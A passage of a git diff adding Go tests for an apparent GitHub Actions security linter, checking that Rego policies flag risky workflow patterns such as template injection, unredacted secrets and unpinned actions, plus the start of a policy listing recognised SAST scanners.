+ pipeline := parseGitHubActions(t, data)
+ findings, err := engine.Evaluate(context.Background(), pipeline, tc.cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-104" {
+ hits++
+ }
+ }
+ if hits != tc.wantCount {
+ t.Fatalf("%s cfg=%v: expected %d ISSUE-104, got %d", tc.fixture, tc.cfg, tc.wantCount, hits)
+ }
+ })
+ }
+}
+
+// TestIssue210_BotConditions flags workflows that gate behaviour on
+// spoofable identity fields (github.actor, sender.login, etc.).
+// Branch/ref conditions stay silent.
+func TestIssue210_BotConditions(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {"violation_actor_dependabot.yml", []string{"violation_actor_dependabot/merge"}},
+ {"violation_sender_login.yml", []string{"violation_sender_login/label"}},
+ {"clean_branch_condition.yml", nil},
+ }
+
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ for _, tc := range cases {
+ t.Run(tc.fixture, func(t *testing.T) {
+ tmp := t.TempDir()
+ wfDir := filepath.Join(tmp, ".github", "workflows")
+ if err := os.MkdirAll(wfDir, 0o755); err != nil {
+ t.Fatal(err)
+ }
+ src := filepath.Join("testdata", "ISSUE-210", "github", tc.fixture)
+ data, err := os.ReadFile(src)
+ if err != nil {
+ t.Fatalf("read fixture: %v", err)
+ }
+ if err := os.WriteFile(filepath.Join(wfDir, tc.fixture), data, 0o644); err != nil {
+ t.Fatal(err)
+ }
+ pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+ if err != nil {
+ t.Fatalf("scan: %v", err)
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := make([]string, 0)
+ for _, f := range findings {
+ if f.Code != "ISSUE-210" {
+ continue
+ }
+ hits = append(hits, f.Job)
+ }
+ sort.Strings(hits)
+ expected := append([]string(nil), tc.expectedHits...)
+ sort.Strings(expected)
+ if !stringSlicesEqual(hits, expected) {
+ t.Fatalf("%s: expected %v, got %v", tc.fixture, expected, hits)
+ }
+ })
+ }
+}
+
+// TestIssue303_UnredactedSecrets flags workflows that deserialise a
+// secret via fromJSON and project one of its fields β the fresh
+// string bypasses GitHub's log redaction.
+func TestIssue303_UnredactedSecrets(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {"violation_env.yml", []string{"violation_env/deploy"}},
+ {"violation_run.yml", []string{"violation_run/notify"}},
+ {"clean_scoped.yml", nil},
+ }
+
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ for _, tc := range cases {
+ t.Run(tc.fixture, func(t *testing.T) {
+ tmp := t.TempDir()
+ wfDir := filepath.Join(tmp, ".github", "workflows")
+ if err := os.MkdirAll(wfDir, 0o755); err != nil {
+ t.Fatal(err)
+ }
+ src := filepath.Join("testdata", "ISSUE-303", "github", tc.fixture)
+ data, err := os.ReadFile(src)
+ if err != nil {
+ t.Fatalf("read fixture: %v", err)
+ }
+ if err := os.WriteFile(filepath.Join(wfDir, tc.fixture), data, 0o644); err != nil {
+ t.Fatal(err)
+ }
+ pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+ if err != nil {
+ t.Fatalf("scan: %v", err)
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := make([]string, 0)
+ for _, f := range findings {
+ if f.Code != "ISSUE-303" {
+ continue
+ }
+ hits = append(hits, f.Job)
+ }
+ sort.Strings(hits)
+ expected := append([]string(nil), tc.expectedHits...)
+ sort.Strings(expected)
+ if !stringSlicesEqual(hits, expected) {
+ t.Fatalf("%s: expected %v, got %v", tc.fixture, expected, hits)
+ }
+ })
+ }
+}
+
+// TestIssue106_CachePoisoning flags release/publish workflows that
+// restore a build cache without a release-ref-scoped key. A plain CI
+// workflow or a release workflow with the ref woven into the cache
+// key stays silent.
+func TestIssue106_CachePoisoning(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {"violation_release_unkeyed.yml", []string{"violation_release_unkeyed/publish"}},
+ {"violation_publish_action.yml", []string{"violation_publish_action/build"}},
+ {"clean_release_scoped_key.yml", nil},
+ {"clean_ci_no_publish.yml", nil},
+ }
+
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ for _, tc := range cases {
+ t.Run(tc.fixture, func(t *testing.T) {
+ tmp := t.TempDir()
+ wfDir := filepath.Join(tmp, ".github", "workflows")
+ if err := os.MkdirAll(wfDir, 0o755); err != nil {
+ t.Fatal(err)
+ }
+ src := filepath.Join("testdata", "ISSUE-106", "github", tc.fixture)
+ data, err := os.ReadFile(src)
+ if err != nil {
+ t.Fatalf("read fixture: %v", err)
+ }
+ if err := os.WriteFile(filepath.Join(wfDir, tc.fixture), data, 0o644); err != nil {
+ t.Fatal(err)
+ }
+ pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+ if err != nil {
+ t.Fatalf("scan: %v", err)
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := make([]string, 0)
+ for _, f := range findings {
+ if f.Code != "ISSUE-106" {
+ continue
+ }
+ hits = append(hits, f.Job)
+ }
+ sort.Strings(hits)
+ expected := append([]string(nil), tc.expectedHits...)
+ sort.Strings(expected)
+ if !stringSlicesEqual(hits, expected) {
+ t.Fatalf("%s: expected %v, got %v", tc.fixture, expected, hits)
+ }
+ })
+ }
+}
+
+// TestIssue601_AnonymousDefinition flags workflow files without a
+// top-level `name:`. One finding per file (not per job).
+func TestIssue601_AnonymousDefinition(t *testing.T) {
+ cases := []struct {
+ fixture string
+ wantCount int
+ }{
+ {"violation_unnamed.yml", 1},
+ {"clean_named.yml", 0},
+ }
+
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ for _, tc := range cases {
+ t.Run(tc.fixture, func(t *testing.T) {
+ tmp := t.TempDir()
+ wfDir := filepath.Join(tmp, ".github", "workflows")
+ if err := os.MkdirAll(wfDir, 0o755); err != nil {
+ t.Fatal(err)
+ }
+ src := filepath.Join("testdata", "ISSUE-601", "github", tc.fixture)
+ data, err := os.ReadFile(src)
+ if err != nil {
+ t.Fatalf("read fixture: %v", err)
+ }
+ if err := os.WriteFile(filepath.Join(wfDir, tc.fixture), data, 0o644); err != nil {
+ t.Fatal(err)
+ }
+ pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+ if err != nil {
+ t.Fatalf("scan: %v", err)
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-601" {
+ hits++
+ }
+ }
+ if hits != tc.wantCount {
+ t.Fatalf("%s: expected %d, got %d", tc.fixture, tc.wantCount, hits)
+ }
+ })
+ }
+}
+
+// TestIssue602_MissingConcurrency flags workflow files with no
+// concurrency block at either workflow or job level.
+func TestIssue602_MissingConcurrency(t *testing.T) {
+ cases := []struct {
+ fixture string
+ wantCount int
+ }{
+ {"violation_no_concurrency.yml", 1},
+ {"clean_workflow_concurrency.yml", 0},
+ {"clean_job_concurrency.yml", 0},
+ }
+
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ for _, tc := range cases {
+ t.Run(tc.fixture, func(t *testing.T) {
+ tmp := t.TempDir()
+ wfDir := filepath.Join(tmp, ".github", "workflows")
+ if err := os.MkdirAll(wfDir, 0o755); err != nil {
+ t.Fatal(err)
+ }
+ src := filepath.Join("testdata", "ISSUE-602", "github", tc.fixture)
+ data, err := os.ReadFile(src)
+ if err != nil {
+ t.Fatalf("read fixture: %v", err)
+ }
+ if err := os.WriteFile(filepath.Join(wfDir, tc.fixture), data, 0o644); err != nil {
+ t.Fatal(err)
+ }
+ pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+ if err != nil {
+ t.Fatalf("scan: %v", err)
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-602" {
+ hits++
+ }
+ }
+ if hits != tc.wantCount {
+ t.Fatalf("%s: expected %d, got %d", tc.fixture, tc.wantCount, hits)
+ }
+ })
+ }
+}
+
+// TestIssue211_UnsoundCondition flags tautology / contradiction
+// patterns inside `if:` expressions.
+func TestIssue211_UnsoundCondition(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {"violation_tautology.yml", []string{"violation_tautology/deploy"}},
+ {"violation_contradiction.yml", []string{"violation_contradiction/build"}},
+ {"clean_normal_check.yml", nil},
+ }
+ runGitHubFixtureCases(t, "ISSUE-211", cases)
+}
+
+// TestIssue212_UnsoundContains flags inverted contains() calls.
+func TestIssue212_UnsoundContains(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {"violation_inverted.yml", []string{"violation_inverted/deploy"}},
+ {"clean_correct_order.yml", nil},
+ {"clean_fromJSON_set.yml", nil},
+ }
+ runGitHubFixtureCases(t, "ISSUE-212", cases)
+}
+
+// runGitHubFixtureCases drives a list of (fixture, expected jobs)
+// cases through ScanGitHubWorkflows + the embedded policies, then
+// asserts the set of job names hit by the given issue code matches.
+func runGitHubFixtureCases(t *testing.T, code string, cases []struct {
+ fixture string
+ expectedHits []string
+},
+) {
+ t.Helper()
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ for _, tc := range cases {
+ t.Run(tc.fixture, func(t *testing.T) {
+ tmp := t.TempDir()
+ wfDir := filepath.Join(tmp, ".github", "workflows")
+ if err := os.MkdirAll(wfDir, 0o755); err != nil {
+ t.Fatal(err)
+ }
+ src := filepath.Join("testdata", code, "github", tc.fixture)
+ data, err := os.ReadFile(src)
+ if err != nil {
+ t.Fatalf("read fixture: %v", err)
+ }
+ if err := os.WriteFile(filepath.Join(wfDir, tc.fixture), data, 0o644); err != nil {
+ t.Fatal(err)
+ }
+ pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+ if err != nil {
+ t.Fatalf("scan: %v", err)
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := make([]string, 0)
+ for _, f := range findings {
+ if f.Code != code {
+ continue
+ }
+ hits = append(hits, f.Job)
+ }
+ sort.Strings(hits)
+ expected := append([]string(nil), tc.expectedHits...)
+ sort.Strings(expected)
+ if !stringSlicesEqual(hits, expected) {
+ t.Fatalf("%s: expected %v, got %v", tc.fixture, expected, hits)
+ }
+ })
+ }
+}
+
+// TestIssue603_WorkflowMisfeature flags upload-artifact of the
+// whole checkout directory (leaks .git/).
+func TestIssue603_WorkflowMisfeature(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {"violation_dot.yml", []string{"violation_dot/build"}},
+ {"violation_workspace.yml", []string{"violation_workspace/build"}},
+ {"clean_scoped_path.yml", nil},
+ }
+ runGitHubFixtureCases(t, "ISSUE-603", cases)
+}
+
+// TestIssue604_WorkflowObfuscation flags zero-width / bidi Unicode
+// inside scripts, env, or action with: inputs.
+func TestIssue604_WorkflowObfuscation(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {"violation_zero_width.yml", []string{"violation_zero_width/deploy"}},
+ {"clean.yml", nil},
+ }
+ runGitHubFixtureCases(t, "ISSUE-604", cases)
+}
+
+// TestIssue605_UseTrustedPublishing flags publish steps that carry a
+// static token rather than OIDC.
+func TestIssue605_UseTrustedPublishing(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {"violation_pypi_static.yml", []string{"violation_pypi_static/publish"}},
+ {"clean_oidc.yml", nil},
+ }
+ runGitHubFixtureCases(t, "ISSUE-605", cases)
+}
+
+// TestIssue606_DependabotInsecureExec flags a dependabot.yml that
+// re-enables insecure-external-code-execution on an ecosystem.
+func TestIssue606_DependabotInsecureExec(t *testing.T) {
+ type tc struct {
+ fixture string
+ wantCount int
+ }
+ cases := []tc{
+ {"violation_allow.yml", 1},
+ {"clean.yml", 0},
+ }
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ for _, c := range cases {
+ t.Run(c.fixture, func(t *testing.T) {
+ tmp := t.TempDir()
+ ghDir := filepath.Join(tmp, ".github")
+ if err := os.MkdirAll(filepath.Join(tmp, ".github", "workflows"), 0o755); err != nil {
+ t.Fatal(err)
+ }
+ src := filepath.Join("testdata", "ISSUE-606", "github", c.fixture)
+ data, err := os.ReadFile(src)
+ if err != nil {
+ t.Fatalf("read fixture: %v", err)
+ }
+ if err := os.WriteFile(filepath.Join(ghDir, "dependabot.yml"), data, 0o644); err != nil {
+ t.Fatal(err)
+ }
+ // Minimal workflow to give the scanner something to look at.
+ minimal := []byte("name: x\non: [push]\njobs:\n x:\n runs-on: ubuntu-latest\n steps:\n - run: echo x\n")
+ if err := os.WriteFile(filepath.Join(tmp, ".github", "workflows", "w.yml"), minimal, 0o644); err != nil {
+ t.Fatal(err)
+ }
+ pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+ if err != nil {
+ t.Fatalf("scan: %v", err)
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-606" {
+ hits++
+ }
+ }
+ if hits != c.wantCount {
+ t.Fatalf("%s: expected %d, got %d", c.fixture, c.wantCount, hits)
+ }
+ })
+ }
+}
+
+// TestIssue304_UndocumentedPermissions flags jobs that run with no
+// explicit permissions: block at either level.
+func TestIssue304_UndocumentedPermissions(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {"violation_no_perms.yml", []string{"violation_no_perms/build"}},
+ {"clean_workflow_perms.yml", nil},
+ {"clean_job_perms.yml", nil},
+ }
+ runGitHubFixtureCases(t, "ISSUE-304", cases)
+}
+
+// TestIssue305_SecretsOutsideEnv flags deploy/publish jobs that use
+// secrets without an environment: gate. Plain CI jobs reading a
+// secret stay silent.
+func TestIssue305_SecretsOutsideEnv(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {"violation_release.yml", []string{"violation_release/publish"}},
+ {"clean_with_env.yml", nil},
+ {"clean_ci_with_secret.yml", nil},
+ }
+ runGitHubFixtureCases(t, "ISSUE-305", cases)
+}
+
+// TestIssue607_DependabotMissingCooldown flags dependabot ecosystems
+// with no cooldown window.
+func TestIssue607_DependabotMissingCooldown(t *testing.T) {
+ type tc struct {
+ fixture string
+ wantCount int
+ }
+ cases := []tc{
+ {"violation_no_cooldown.yml", 2},
+ {"clean_with_cooldown.yml", 0},
+ }
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ for _, c := range cases {
+ t.Run(c.fixture, func(t *testing.T) {
+ tmp := t.TempDir()
+ if err := os.MkdirAll(filepath.Join(tmp, ".github", "workflows"), 0o755); err != nil {
+ t.Fatal(err)
+ }
+ src := filepath.Join("testdata", "ISSUE-607", "github", c.fixture)
+ data, err := os.ReadFile(src)
+ if err != nil {
+ t.Fatalf("read fixture: %v", err)
+ }
+ if err := os.WriteFile(filepath.Join(tmp, ".github", "dependabot.yml"), data, 0o644); err != nil {
+ t.Fatal(err)
+ }
+ minimal := []byte("name: x\non: [push]\njobs:\n x:\n runs-on: ubuntu-latest\n steps:\n - run: echo x\n")
+ if err := os.WriteFile(filepath.Join(tmp, ".github", "workflows", "w.yml"), minimal, 0o644); err != nil {
+ t.Fatal(err)
+ }
+ pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+ if err != nil {
+ t.Fatalf("scan: %v", err)
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-607" {
+ hits++
+ }
+ }
+ if hits != c.wantCount {
+ t.Fatalf("%s: expected %d, got %d", c.fixture, c.wantCount, hits)
+ }
+ })
+ }
+}
+
+// TestIssue306_GitHubAppSkipRevoke flags app-token minting with
+// skip-token-revoke: true.
+func TestIssue306_GitHubAppSkipRevoke(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {"violation_skip_revoke.yml", []string{"violation_skip_revoke/release"}},
+ {"clean_default.yml", nil},
+ }
+ runGitHubFixtureCases(t, "ISSUE-306", cases)
+}
+
+// TestIssue415_PullRequestTargetWithHeadCheckout flags the tj-actions
+// pattern: pull_request_target + checkout of the PR head SHA/ref.
+func TestIssue415_PullRequestTargetWithHeadCheckout(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {"violation_head_sha.yml", []string{"violation_head_sha/preview"}},
+ {"clean_no_ref.yml", nil},
+ }
+ runGitHubFixtureCases(t, "ISSUE-415", cases)
+}
+
+// TestIssue215_TemplateInjectionVars flags scripts that expand
+// `vars.*` or `inputs.*` directly into a shell command; env-binding
+// pattern stays silent.
+func TestIssue215_TemplateInjectionVars(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {"violation_vars_docker_login.yml", []string{"violation_vars_docker_login/login"}},
+ {"violation_inputs_reusable.yml", []string{"violation_inputs_reusable/run"}},
+ {"clean_env_binding.yml", nil},
+ }
+ runGitHubFixtureCases(t, "ISSUE-215", cases)
+}
+
+// TestIssue308_SecretsDynamicIndex flags secrets[expr] with a
+// non-literal index; literal quoted forms (secrets.NAME,
+// secrets['NAME']) stay silent.
+func TestIssue308_SecretsDynamicIndex(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {"violation_secrets_env_index.yml", []string{"violation_secrets_env_index/e2e"}},
+ {"clean_literal_quoted.yml", nil},
+ }
+ runGitHubFixtureCases(t, "ISSUE-308", cases)
+}
+
+// TestIssue113_RefConfusion drives a hand-built IR because the
+// API metadata feeding ref-confusion is not exercised by the unit-
+// test harness (PLUMBER_DISABLE_GITHUB_API is set in TestMain).
+// The test checks that the policy fires exactly when RefIsAmbiguous
+// is true on an Action.
+func TestIssue113_RefConfusion(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitHub,
+ Jobs: []ir.Job{
+ {
+ Name: "build",
+ Uses: []ir.Action{
+ {Uses: "owner/repo@v1", Metadata: &ir.ActionMetadata{RefKind: "tag", RefExists: true, RefIsAmbiguous: true}},
+ {Uses: "actions/checkout@v4", Metadata: &ir.ActionMetadata{RefKind: "tag", RefExists: true}},
+ },
+ },
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-113" {
+ hits++
+ }
+ }
+ if hits != 1 {
+ t.Fatalf("expected 1 ISSUE-113 finding, got %d", hits)
+ }
+}
+
+// TestIssue114_KnownVulnerableAction same hand-built approach β
+// stub the Advisories slice directly on the IR.
+func TestIssue114_KnownVulnerableAction(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitHub,
+ Jobs: []ir.Job{
+ {
+ Name: "build",
+ Uses: []ir.Action{
+ {Uses: "tj-actions/changed-files@v45", Metadata: &ir.ActionMetadata{RefKind: "tag", RefExists: true, Advisories: []string{"GHSA-mrrh-fwg8-r2c3"}}},
+ {Uses: "actions/checkout@v4", Metadata: &ir.ActionMetadata{RefKind: "tag", RefExists: true}},
+ },
+ },
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := 0
+ for _, f := range findings {
+ if f.Code != "ISSUE-114" {
+ continue
+ }
+ hits++
+ // The message must carry the advisory URL so the
+ // terminal renderer turns it into a clickable link.
+ wantLink := "https://github.com/advisories/GHSA-mrrh-fwg8-r2c3"
+ if !strings.Contains(f.Message, wantLink) {
+ t.Fatalf("ISSUE-114 message missing advisory URL\n got: %s\n want substring: %s", f.Message, wantLink)
+ }
+ }
+ if hits != 1 {
+ t.Fatalf("expected 1 ISSUE-114 finding, got %d", hits)
+ }
+}
+
+// TestIssue115_SuperfluousAction flags peter-evans/create-pull-request
+// and similar third-party wrappers.
+func TestIssue115_SuperfluousAction(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {"violation_peter_evans_pr.yml", []string{"violation_peter_evans_pr/open-pr"}},
+ {"clean.yml", nil},
+ }
+ runGitHubFixtureCases(t, "ISSUE-115", cases)
+}
+
+// TestIssue213_UnsafeGitHubContextDump flags jobs that serialise
+// the entire `github` context via toJson(github).
+func TestIssue213_UnsafeGitHubContextDump(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {"violation_tojson_github_event.yml", []string{"violation_tojson_github_event/report"}},
+ {"clean.yml", nil},
+ }
+ runGitHubFixtureCases(t, "ISSUE-213", cases)
+}
+
+// TestIssue214_UnpinnedPackageInstall flags `pip install pkg` /
+// `npm install pkg` without a pinned version or lockfile.
+func TestIssue214_UnpinnedPackageInstall(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {"violation_pip_unpinned.yml", []string{"violation_pip_unpinned/test"}},
+ {"clean.yml", nil},
+ }
+ runGitHubFixtureCases(t, "ISSUE-214", cases)
+}
+
+// TestIssue112_ReleaseWorkflowUnsigned flags release jobs that
+// publish artefacts without any signing step.
+func TestIssue112_ReleaseWorkflowUnsigned(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {"violation_release_unsigned.yml", []string{"violation_release_unsigned/publish"}},
+ {"clean_cosign.yml", nil},
+ }
+ runGitHubFixtureCases(t, "ISSUE-112", cases)
+}
+
+// TestIssue609_SASTWorkflowMissing flags repos with workflows but
+// no SAST action invocation.
+func TestIssue609_SASTWorkflowMissing(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ t.Run("no-sast", func(t *testing.T) {
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitHub,
+ Jobs: []ir.Job{{
+ Name: "build",
+ OriginFile: "/tmp/.github/workflows/build.yml",
+ Uses: []ir.Action{{Uses: "actions/checkout@v4"}},
+ }},
+ }
+ findings, _ := engine.Evaluate(context.Background(), pipeline, nil)
+ hits := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-609" {
+ hits++
+ }
+ }
+ if hits != 1 {
+ t.Fatalf("expected 1 ISSUE-609, got %d", hits)
+ }
+ })
+ t.Run("has-sast", func(t *testing.T) {
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitHub,
+ Jobs: []ir.Job{{
+ Name: "analyze",
+ OriginFile: "/tmp/.github/workflows/codeql.yml",
+ Uses: []ir.Action{{Uses: "github/codeql-action/analyze@v3"}},
+ }},
+ }
+ findings, _ := engine.Evaluate(context.Background(), pipeline, nil)
+ for _, f := range findings {
+ if f.Code == "ISSUE-609" {
+ t.Fatalf("unexpected ISSUE-609 on SAST-equipped repo: %+v", f)
+ }
+ }
+ })
+}
+
+// TestIssue608_DependencyUpdateToolMissing flags repos with
+// workflows but neither dependabot nor renovate config.
+func TestIssue608_DependencyUpdateToolMissing(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ baseJobs := []ir.Job{{Name: "build", OriginFile: "/tmp/.github/workflows/build.yml"}}
+ t.Run("no-tool", func(t *testing.T) {
+ pipeline := &ir.NormalizedPipeline{Provider: ir.ProviderGitHub, Jobs: baseJobs}
+ findings, _ := engine.Evaluate(context.Background(), pipeline, nil)
+ hits := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-608" {
+ hits++
+ }
+ }
+ if hits != 1 {
+ t.Fatalf("expected 1 ISSUE-608, got %d", hits)
+ }
+ })
+ t.Run("has-dependabot", func(t *testing.T) {
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitHub,
+ Jobs: baseJobs,
+ Dependabot: &ir.DependabotConfig{Path: "/tmp/.github/dependabot.yml"},
+ }
+ findings, _ := engine.Evaluate(context.Background(), pipeline, nil)
+ for _, f := range findings {
+ if f.Code == "ISSUE-608" {
+ t.Fatalf("unexpected ISSUE-608 on dependabot-equipped repo: %+v", f)
+ }
+ }
+ })
+ t.Run("has-renovate", func(t *testing.T) {
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitHub,
+ Jobs: baseJobs,
+ RenovateConfigPath: "/tmp/renovate.json",
+ }
+ findings, _ := engine.Evaluate(context.Background(), pipeline, nil)
+ for _, f := range findings {
+ if f.Code == "ISSUE-608" {
+ t.Fatalf("unexpected ISSUE-608 on renovate-equipped repo: %+v", f)
+ }
+ }
+ })
+}
+
+// TestIssue610_SecurityPolicyMissing flags repos with workflows
+// but no SECURITY.md.
+func TestIssue610_SecurityPolicyMissing(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ baseJobs := []ir.Job{{Name: "build", OriginFile: "/tmp/.github/workflows/build.yml"}}
+ t.Run("missing", func(t *testing.T) {
+ pipeline := &ir.NormalizedPipeline{Provider: ir.ProviderGitHub, Jobs: baseJobs}
+ findings, _ := engine.Evaluate(context.Background(), pipeline, nil)
+ hits := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-610" {
+ hits++
+ }
+ }
+ if hits != 1 {
+ t.Fatalf("expected 1 ISSUE-610, got %d", hits)
+ }
+ })
+ t.Run("present", func(t *testing.T) {
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitHub,
+ Jobs: baseJobs,
+ SecurityPolicyPath: "/tmp/SECURITY.md",
+ }
+ findings, _ := engine.Evaluate(context.Background(), pipeline, nil)
+ for _, f := range findings {
+ if f.Code == "ISSUE-610" {
+ t.Fatalf("unexpected ISSUE-610: %+v", f)
+ }
+ }
+ })
+}
+
+// TestIssue107_DockerfileUnpinnedBase flags FROM directives
+// without a @sha256 digest.
+func TestIssue107_DockerfileUnpinnedBase(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitHub,
+ Dockerfiles: []ir.Dockerfile{
+ {
+ Path: "/tmp/Dockerfile",
+ Bases: []ir.DockerfileBase{
+ {Image: "alpine:3.20", Line: 1, PinnedByDigest: false},
+ {Image: "node:20@sha256:abc123", Line: 7, PinnedByDigest: true},
+ {Image: "scratch", Line: 12, PinnedByDigest: false},
+ {Image: "builder", Line: 15, PinnedByDigest: false},
+ },
+ },
+ },
+ }
+ findings, _ := engine.Evaluate(context.Background(), pipeline, nil)
+ hits := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-107" {
+ hits++
+ }
+ }
+ if hits != 1 {
+ t.Fatalf("expected 1 ISSUE-107 (alpine:3.20 unpinned), got %d", hits)
+ }
+}
diff --git a/policies/sast_workflow_missing.rego b/policies/sast_workflow_missing.rego
new file mode 100644
index 0000000..9ce4f83
--- /dev/null
+++ b/policies/sast_workflow_missing.rego
@@ -0,0 +1,63 @@
+# sast-workflow-missing β flag repositories that ship workflows but
+# do not run any recognised static application security testing
+# scanner. SAST catches whole vulnerability classes (injection,
+# unsafe deserialisation, crypto misuse) before they reach
+# production; leaving it out of CI means the only gate is manual
+# review, which misses regressions on large diffs.
+#
+# Repository-level rule β emits once per repo when the condition
+# holds, identified by the first job's file. Projects that genuinely
+# cannot run SAST in CI can disable the rule via
+# `--skip-controls repositoriesMustRunSAST`.
+package sast_workflow_missing
+
+import rego.v1
+
+sast_action_prefixes := {
+ "github/codeql-action/init",
+ "github/codeql-action/analyze",
+ "returntocorp/semgrep-action",
+ "semgrep/semgrep-action",
+ "sonarsource/sonarqube-scan-action",
+ "sonarsource/sonarcloud-github-action",
+ "aquasecurity/trivy-action",
+ "snyk/actions",
+ "fossas/fossa-action",
+ "trufflesecurity/trufflehog",
+ "anchore/scan-action",
+ "bearer/bearer-action",
+ "checkmarx/ast-github-action",
+ "microsoft/DevSkim-Action",
